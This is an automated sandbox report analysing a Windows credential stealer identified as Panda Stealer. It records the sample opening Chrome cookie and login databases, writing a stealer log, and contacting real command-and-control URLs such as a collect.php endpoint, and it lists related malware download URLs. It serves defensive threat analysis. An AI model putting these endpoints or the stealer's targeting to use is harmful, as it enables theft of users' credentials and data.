        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_00856127 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,0_2_00856127
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
        Source: qRsw2oZH24.exe, 00000000.00000003.319443448.0000000001424000.00000004.00000020.00020000.00000000.sdmp, qRsw2oZH24.exe, 00000000.00000002.321406277.0000000001424000.00000004.00000020.00020000.00000000.sdmp, qRsw2oZH24.exe, 00000000.00000003.319625775.0000000001424000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWt
        Source: qRsw2oZH24.exe, 00000000.00000002.321746101.0000000009A12000.00000004.00000800.00020000.00000000.sdmp, qRsw2oZH24.exe, 00000000.00000003.319636837.0000000009A11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_0087337D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0087337D
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_008724FE VirtualProtect ?,-00000001,00000104,?,?,?,0000001C0_2_008724FE
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_0081347A ___std_fs_get_current_path@8,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0081347A
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_00814455 GetProcessHeap,0_2_00814455
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_00880095 mov eax, dword ptr fs:[00000030h]0_2_00880095
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_00872780 mov eax, dword ptr fs:[00000030h]0_2_00872780
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_0087337D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0087337D
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_0086E44C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0086E44C
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_0086E9B2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0086E9B2
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0088B0BE
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: GetLocaleInfoW,0_2_0088B1C4
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0088B293
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,0_2_0086D58A
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: EnumSystemLocalesW,0_2_0087F7EF
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0088A932
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: EnumSystemLocalesW,0_2_0088ABD4
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_0086E678 cpuid 0_2_0086E678
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_0086E854 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0086E854
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_00883A19 _free,_free,_free,GetTimeZoneInformation,_free,0_2_00883A19

        Stealing of Sensitive Information

        barindex
        Yara detected Panda Stealer
        Source: Yara matchFile source: qRsw2oZH24.exe, type: SAMPLE
        Source: Yara matchFile source: 0.2.qRsw2oZH24.exe.810000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.0.qRsw2oZH24.exe.810000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: Process Memory Space: qRsw2oZH24.exe PID: 5708, type: MEMORYSTR
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

        Remote Access Functionality

        barindex
        Yara detected Panda Stealer
        Source: Yara matchFile source: qRsw2oZH24.exe, type: SAMPLE
        Source: Yara matchFile source: 0.2.qRsw2oZH24.exe.810000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.0.qRsw2oZH24.exe.810000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: Process Memory Space: qRsw2oZH24.exe PID: 5708, type: MEMORYSTR

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Native API        		Path InterceptionPath Interception1
        Disable or Modify Tools        		1
        OS Credential Dumping        		2
        System Time Discovery        		Remote Services1
        Archive Collected Data        		Exfiltration Over Other Network Medium2
        Encrypted Channel        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Deobfuscate/Decode Files or Information        		LSASS Memory21
        Security Software Discovery        		Remote Desktop Protocol1
        Data from Local System        		Exfiltration Over Bluetooth2
        Ingress Tool Transfer        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
        Obfuscated Files or Information        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS1
        Remote System Discovery        		Distributed Component Object ModelInput CaptureScheduled Transfer13
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
        File and Directory Discovery        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials23
        System Information Discovery        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        qRsw2oZH24.exe80%ReversingLabsWin32.Trojan.StellarStealer
        qRsw2oZH24.exe100%AviraHEUR/AGEN.1213019
        qRsw2oZH24.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        0.0.qRsw2oZH24.exe.810000.0.unpack100%AviraHEUR/AGEN.1213019Download File
        0.2.qRsw2oZH24.exe.810000.0.unpack100%AviraHEUR/AGEN.1213019Download File

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        crimestreetsru.ru.xsph.ru
        		141.8.197.42
        		truefalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://crimestreetsru.ru.xsph.rufalse
            		high
            http://crimestreetsru.ru.xsph.ru/collect.phpfalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://ac.ecosia.org/autocomplete?q=OITRMEDRTX.SUDEKLVFW.0.drfalse
                		high
                https://search.yahoo.com?fr=crmas_sfpOITRMEDRTX.SUDEKLVFW.0.drfalse
                  		high
                  https://search.yahoo.com?fr=crmas_sfpfOITRMEDRTX.SUDEKLVFW.0.drfalse
                    		high
                    https://duckduckgo.com/chrome_newtabOITRMEDRTX.SUDEKLVFW.0.drfalse
                      		high
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=OITRMEDRTX.SUDEKLVFW.0.drfalse
                        		high
                        https://duckduckgo.com/ac/?q=OITRMEDRTX.SUDEKLVFW.0.drfalse
                          		high
                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchOITRMEDRTX.SUDEKLVFW.0.drfalse
                            		high
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoOITRMEDRTX.SUDEKLVFW.0.drfalse
                              		high
                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=OITRMEDRTX.SUDEKLVFW.0.drfalse
                                		high
                                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=OITRMEDRTX.SUDEKLVFW.0.drfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  141.8.197.42
                                  		crimestreetsru.ru.xsph.ruRussian Federation
                                  		35278SPRINTHOSTRUfalse

                                  General Information

                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                  Analysis ID:740211
                                  Start date and time:2022-11-07 19:24:54 +01:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 5m 6s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:qRsw2oZH24.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:1
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal84.troj.spyw.winEXE@1/3@1/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HDC Information:
                                  • Successful, ratio: 2% (good quality ratio 2%)
                                  • Quality average: 73.1%
                                  • Quality standard deviation: 13.9%
                                  HCA Information:
                                  • Successful, ratio: 90%
                                  • Number of executed functions: 67
                                  • Number of non-executed functions: 127
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated

                                  Warnings

                                  • Report size getting too big, too many NtOpenFile calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  141.8.197.42svchost.exeGet hashmaliciousBrowse
                                  • asdqwezxc.ru.xsph.ru/collect.php
                                  btwGaban.exeGet hashmaliciousBrowse
                                  • a0680922.xsph.ru/collect.php
                                  v8YnxUbz23.exeGet hashmaliciousBrowse
                                  • a0620960.xsph.ru/5.exe
                                  6CQieC3oMC.exeGet hashmaliciousBrowse
                                  • a0620960.xsph.ru/5.exe
                                  Oo8GcnVrGH.exeGet hashmaliciousBrowse
                                  • a0620960.xsph.ru/5.exe
                                  ADNOC RFQ 88556524.xlsxGet hashmaliciousBrowse
                                  • a0599932.xsph.ru/GrBwWewiSjoPFvO.exe
                                  P5dD4xbWeX.exeGet hashmaliciousBrowse
                                  • a0568605.xsph.ru/forinstalls2.exe
                                  294J8weDKq.exeGet hashmaliciousBrowse
                                  • a0541862.xsph.ru//getCommand.php?id=VGVzdF85MDI1MTczQw
                                  KVINC5FNPj.exeGet hashmaliciousBrowse
                                  • a0510942.xsph.ru/gate.php
                                  uZS3kvK3Q6.exeGet hashmaliciousBrowse
                                  • a0480986.xsph.ru/api/download.get
                                  windows.exeGet hashmaliciousBrowse
                                  • f0427103.xsph.ru/gate.php
                                  Xenos (2).exeGet hashmaliciousBrowse
                                  • a0458390.xsph.ru/upload.php

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  SPRINTHOSTRUKYN5ODHmhK.exeGet hashmaliciousBrowse
                                  • 185.185.68.48
                                  file.exeGet hashmaliciousBrowse
                                  • 141.8.199.114
                                  file.exeGet hashmaliciousBrowse
                                  • 141.8.199.114
                                  file.exeGet hashmaliciousBrowse
                                  • 141.8.199.114
                                  file.exeGet hashmaliciousBrowse
                                  • 141.8.199.114
                                  file.exeGet hashmaliciousBrowse
                                  • 141.8.199.114
                                  file.exeGet hashmaliciousBrowse
                                  • 141.8.199.114
                                  file.exeGet hashmaliciousBrowse
                                  • 141.8.199.114
                                  file.exeGet hashmaliciousBrowse
                                  • 141.8.199.114
                                  file.exeGet hashmaliciousBrowse
                                  • 141.8.199.114
                                  file.exeGet hashmaliciousBrowse
                                  • 141.8.199.114
                                  file.exeGet hashmaliciousBrowse
                                  • 141.8.199.114
                                  file.exeGet hashmaliciousBrowse
                                  • 141.8.199.114
                                  file.exeGet hashmaliciousBrowse
                                  • 141.8.199.114
                                  file.exeGet hashmaliciousBrowse
                                  • 141.8.199.114
                                  file.exeGet hashmaliciousBrowse
                                  • 141.8.199.114
                                  file.exeGet hashmaliciousBrowse
                                  • 141.8.199.114
                                  file.exeGet hashmaliciousBrowse
                                  • 141.8.199.114
                                  file.exeGet hashmaliciousBrowse
                                  • 141.8.199.114
                                  file.exeGet hashmaliciousBrowse
                                  • 141.8.199.114

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\HVQCHOGDTTCFCDEXTQIC.GUCY

                                  Download File
                                  Process:C:\Users\user\Desktop\qRsw2oZH24.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):745
                                  Entropy (8bit):4.575677159093834
                                  Encrypted:false
                                  SSDEEP:12:KSi2YHLUTRMUs/5xcIx4ysD8UzmH+M3VDAbX0I031M:KS/Yi7ixcIx4ysDL6+M3JAbXH7
                                  MD5:E9BF2694DBA67EDFC4802D03FF30B003
                                  SHA1:1BE2CEDC44700FE598304F17C64D3C1B70FB9645
                                  SHA-256:E84DE3EDEDF672C1DA2E8985536D0F077F433FB5C5288E7386D31EB75E7D1CBB
                                  SHA-512:F4A974FA53ED9BFE75D2AEED24C2ECCB6D6BEB68A797E2BF063CCBC0F2A8405BA746EC8EB4C96B77E7582B7016B41E793F82DA5659369C88F39007ED507D44A7
                                  Malicious:false
                                  Reputation:low
                                  Preview:System hash: 387551d32b6f158f0b08c3d14557db37.Build: 1029702468.Version: 1.11.Build name: xuinya.----------------------------------------------------.[BETA BUILD v1.11] COLLECTOR PROJECT.----------------------------------------------------..System: Windows 10 (x64)..AutoFill: 0.Passwords: 0.Cookies: 0.Cards: 0..Atomic: -.Armory: -.Bytecoin: -.BitcoinCore: -.DashCore: -.Litecoin: -.Electrum: -.Zcash: -.Ethereum: -..Authy (2FA): -.Files: 12.FileZilla: -.NordVPN: -.Telegram: -.Discord: -.PSI: -.Wallet: -.Pidgin: -.Steam: -...----------------------------------------------------.Startup path: C:\Users\user\Desktop\qRsw2oZH24.exe.Start time: Mon Nov 7 20:48:12 2022.Get log time: 4 sec..----------------------------------------------------..

                                  C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\OITRMEDRTX.SUDEKLVFW

                                  Download File
                                  Process:C:\Users\user\Desktop\qRsw2oZH24.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                  Category:dropped
                                  Size (bytes):94208
                                  Entropy (8bit):1.2880737026424216
                                  Encrypted:false
                                  SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                  MD5:5F02C426BCF0D3E3DC81F002F9125663
                                  SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                  SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                  SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\OTVETTOFFSSKRQXOSGC.IPWSQRTLGVWJXRVH

                                  Download File
                                  Process:C:\Users\user\Desktop\qRsw2oZH24.exe
                                  File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):826039
                                  Entropy (8bit):7.945563228203397
                                  Encrypted:false
                                  SSDEEP:24576:5CZ0QqPbE21gsdrSrW1nvbeZ85A4Fw1KEBB+iQ0OW+K5mAcZ/G4o:0Z0DPgyqcnvbbhEv+7lK52Z/Zo
                                  MD5:944FB8BA45BBC5DA5BD525037644293C
                                  SHA1:EC65FC516ECF718A301A51D6328AAB2E654BB341
                                  SHA-256:671502A0A92020E6B1D6F4ACAC39F3667BFC68B7BEB3C1DA4AD57F7BBD223482
                                  SHA-512:14A29C99D3B7709F08AFED8BFF74A2B0AA21FF523DA49834EDA1AE37177D1D055DDDA47B2B2DF26648A230B2F82A2B6D0AE23867AB77249A2A331499F4286865
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...uEy..../1....[...4.Q4..gbL....R.bA% R.#..(bG..c.}Q..."..H.J{_..<....~3kf....}....:g.53k.Y3..g....}.YX.I..?.,l........,...q..F.R.;6l....M<.>.a3....g.g.l.SLHG..1v..t.nD.....,l.'#6..Bl..m6.....l..X7.zOp,...^x..~.]GYn...........yz.9...^.y.s......5,.K.".u..kU..?(..M..X..fi=....u..Xx...........O.G.7Q.5..Tv.d...B.....u...c..M.._....t=...U..IAs.....ywMA.....Q,.> .......QL..Y..c..;B<.......,n.g..[$..Ym...Pf....<...,[>S...mb.]....#.......p.,..~]..f..{%.....o9.....}......@cj.......C.O.;.......cx..Ou.k2U6.......P.XP...6...nk.........P..b.....8O...n..2.WB.8[....'PZ..;.F..{...4.o.';...!-q4........?........F..(..S.0..i.....s........M.......1... ....1.u<._....0..S..(..>.c.@..x..0.\.. ...\..F._.XT..S... ....*.".........#..B.d......@i;..?....3?.:.1.D.[.p.....3....-.......N.....`..@^.D.h...h2...).S..4.......B.m..j..O.Z6......}A.z.N...0....*_#;..P$..k.^#.j..#.9v o@x...c..

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):6.766093860800393
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:qRsw2oZH24.exe
                                  File size:698280
                                  MD5:740554cb974f32f7542251b70cbafb6a
                                  SHA1:15b5556c763412afbd882a2876fb85bad7a4d55c
                                  SHA256:431fd6d04bb3e1c1dfb5ffc096246c3321fd467a110433640823f9ea5c90751d
                                  SHA512:3eb17f1158023a7478c7a526c17a90f0bd34ff60d31e87d9c19cde7225b8549d4665eb9c8e2f992b29aa4803c646fb19d04fe54204e116463cf8d5ef8f3efc76
                                  SSDEEP:12288:VoJqNIPtNmO6IOOEp0TMlja7NRl2PSVikIyoyueh+AkHcnLwuukoCOD6zlWjOz+2:VoJEKZ6IEGTMxapRl2PSwHTehy6BN+p4
                                  TLSH:7FE4C033F0C2C07ED0321032596CEB6259BFF9320A25499BA3C4156E9FB57D29E3665B
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`..P$...$...$.......4...............0.......8.......%.......u.......3.......)...$...........&.......%...Rich$..................

                                  File Icon

                                  Icon Hash:00828e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0x45e27e
                                  Entrypoint Section:.text
                                  Digitally signed:true
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x5FCCE7D9 [Sun Dec 6 14:16:57 2020 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:6
                                  OS Version Minor:0
                                  File Version Major:6
                                  File Version Minor:0
                                  Subsystem Version Major:6
                                  Subsystem Version Minor:0
                                  Import Hash:2a908babc5cc3af850e078751d7de0e9

                                  Authenticode Signature

                                  Signature Valid:false
                                  Signature Issuer:CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                  Signature Validation Error:The digital signature of the object did not verify
                                  Error Number:-2146869232
                                  Not Before, Not After
                                  • 3/4/2020 7:39:47 PM 3/3/2021 7:39:47 PM
                                  Subject Chain
                                  • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                  Version:3
                                  Thumbprint MD5:AAEE394B1087AC1044A13D09468CDF1E
                                  Thumbprint SHA-1:2485A7AFA98E178CB8F30C9838346B514AEA4769
                                  Thumbprint SHA-256:C0772D3C9E20C3F4EBB09F5816D6DADA0D8FA86563C2D68898539EC1CD355A1B
                                  Serial:3300000187721772155940C709000000000187

                                  Entrypoint Preview

                                  Instruction
                                  call 00007FDF0C68D9E3h
                                  jmp 00007FDF0C68D239h
                                  cmp ecx, dword ptr [004A2014h]
                                  jne 00007FDF0C68D3C5h
                                  ret
                                  jmp 00007FDF0C68DB07h
                                  mov ecx, dword ptr [ebp-0Ch]
                                  mov dword ptr fs:[00000000h], ecx
                                  pop ecx
                                  pop edi
                                  pop edi
                                  pop esi
                                  pop ebx
                                  mov esp, ebp
                                  pop ebp
                                  push ecx
                                  ret
                                  mov ecx, dword ptr [ebp-10h]
                                  xor ecx, ebp
                                  call 00007FDF0C68D395h
                                  jmp 00007FDF0C68D3A0h
                                  push eax
                                  push dword ptr fs:[00000000h]
                                  lea eax, dword ptr [esp+0Ch]
                                  sub esp, dword ptr [esp+0Ch]
                                  push ebx
                                  push esi
                                  push edi
                                  mov dword ptr [eax], ebp
                                  mov ebp, eax
                                  mov eax, dword ptr [004A2014h]
                                  xor eax, ebp
                                  push eax
                                  push dword ptr [ebp-04h]
                                  mov dword ptr [ebp-04h], FFFFFFFFh
                                  lea eax, dword ptr [ebp-0Ch]
                                  mov dword ptr fs:[00000000h], eax
                                  ret
                                  push eax
                                  push dword ptr fs:[00000000h]
                                  lea eax, dword ptr [esp+0Ch]
                                  sub esp, dword ptr [esp+0Ch]
                                  push ebx
                                  push esi
                                  push edi
                                  mov dword ptr [eax], ebp
                                  mov ebp, eax
                                  mov eax, dword ptr [004A2014h]
                                  xor eax, ebp
                                  push eax
                                  mov dword ptr [ebp-10h], eax
                                  push dword ptr [ebp-04h]
                                  mov dword ptr [ebp-04h], FFFFFFFFh
                                  lea eax, dword ptr [ebp-0Ch]
                                  mov dword ptr fs:[00000000h], eax
                                  ret
                                  push eax
                                  push dword ptr fs:[00000000h]
                                  lea eax, dword ptr [esp+0Ch]
                                  sub esp, dword ptr [esp+0Ch]
                                  push ebx
                                  push esi
                                  push edi
                                  mov dword ptr [eax], ebp
                                  mov ebp, eax
                                  mov eax, dword ptr [004A2014h]

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xa06dc0x8c.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xa84000x23a8.reloc
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xa70000x680c.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x992f80x38.rdata
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x994000x18.rdata
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x993300x40.rdata
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x870000x28c.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x854ec0x85600False0.5623700357310215data6.724381241477367IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata0x870000x1a5960x1a600False0.47740484300947866data5.592349666844523IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0xa20000x42d40x1a00False0.1736778846153846DOS executable (block device driver \200\377\377\377\377\261,32-bit sector-support)3.945907427530122IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .reloc0xa70000x680c0x6a00False0.6731647995283019data6.626873203758056IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Imports

                                  DLLImport
